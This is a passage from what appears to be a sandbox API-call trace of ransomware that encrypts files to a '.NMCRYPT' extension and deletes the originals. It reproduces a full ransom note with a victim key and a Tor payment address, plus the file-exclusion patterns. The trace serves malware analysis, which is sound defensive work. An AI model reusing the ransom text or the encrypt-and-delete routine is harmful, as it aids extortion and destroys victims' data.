pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.488] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.489] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.489] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.489] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.489] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0157.489] CryptHashData (hHash=0x9ad838, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.489] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0157.489] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.489] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.489] wcslen (_String="\\\\?\\") returned 0x4 [0157.489] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad278) returned 1 [0157.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.490] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=1069) returned 1 [0157.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.491] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.492] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.492] GetLastError () returned 0x0 [0157.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.481] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.481] GetLastError () returned 0x0 [0158.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.481] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.481] GetLastError () returned 0x0 [0158.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.481] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.481] GetLastError () returned 0x0 [0158.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.481] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x2d, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x2d, lpOverlapped=0x0) returned 1 [0158.481] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x2d, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x30) returned 1 [0158.481] GetLastError () returned 0x0 [0158.481] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x30, lpOverlapped=0x0) returned 1 [0158.481] ReadFile (in: hFile=0x1624, lpBuffer=0x607d60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0158.482] WriteFile (in: hFile=0x588, lpBuffer=0x607d60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0158.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml")) returned 0x20 [0158.482] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml", dwFileAttributes=0x20) returned 0 [0158.482] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned 1 [0158.482] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml")) returned 0 [0158.482] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" [0158.482] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav") returned 1 [0158.482] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xXDE4B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xxde4b.tmp")) returned 0xde4b [0158.488] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xXDE4B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xxde4b.tmp"), dwFlags=0x1) returned 0 [0158.489] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xXDE4B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\.xxde4b.tmp")) returned 1 [0158.489] CryptDestroyKey (hKey=0x9ad278) returned 1 [0158.489] wcslen (_String="OK") returned 0x2 [0158.489] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.489] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.489] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0158.489] CryptDestroyHash (hHash=0x9ad838) returned 1 [0158.489] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0158.489] FindNextFileW (in: hFindFile=0x9ad678, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0158.489] GetLastError () returned 0x12 [0158.489] FindClose (in: hFindFile=0x9ad678 | out: hFindFile=0x9ad678) returned 1 [0158.489] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0158.490] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.490] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0158.490] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0158.490] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.490] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.490] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0158.491] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.491] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.exe") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.dll") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.lnk") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.bat") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.ini") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.msi") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*.scf") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*pagefile.sys*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*NTUSER.DAT*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*AppData*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\winrar\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\java\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\windows\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\ESET\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\AVG\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\AVIRA\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*Atheros*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*Realtek*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*bootmgr*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*boot*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*boot*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*CONFIG.SYS*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*IO.SYS*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*MSDOS.SYS*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*NTDETECT.COM*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*ntldr*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*chrome*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*opera*") returned 0 [0158.491] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", pszSpec="*firefox*") returned 0 [0158.491] wcslen (_String="\\\\?\\") returned 0x4 [0158.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad3b8 [0158.492] wcscmp (_String1=".", _String2=".") returned 0 [0158.492] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.492] wcscmp (_String1="..", _String2=".") returned 1 [0158.492] wcscmp (_String1="..", _String2="..") returned 0 [0158.492] FindNextFileW (in: hFindFile=0x9ad3b8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*NMCRYPT") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*Recovers your files.html") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.exe") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.dll") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.lnk") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.bat") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.ini") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.msi") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*.scf") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*pagefile.sys*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*AppData*") returned 0 [0158.492] PathMatchSpecW 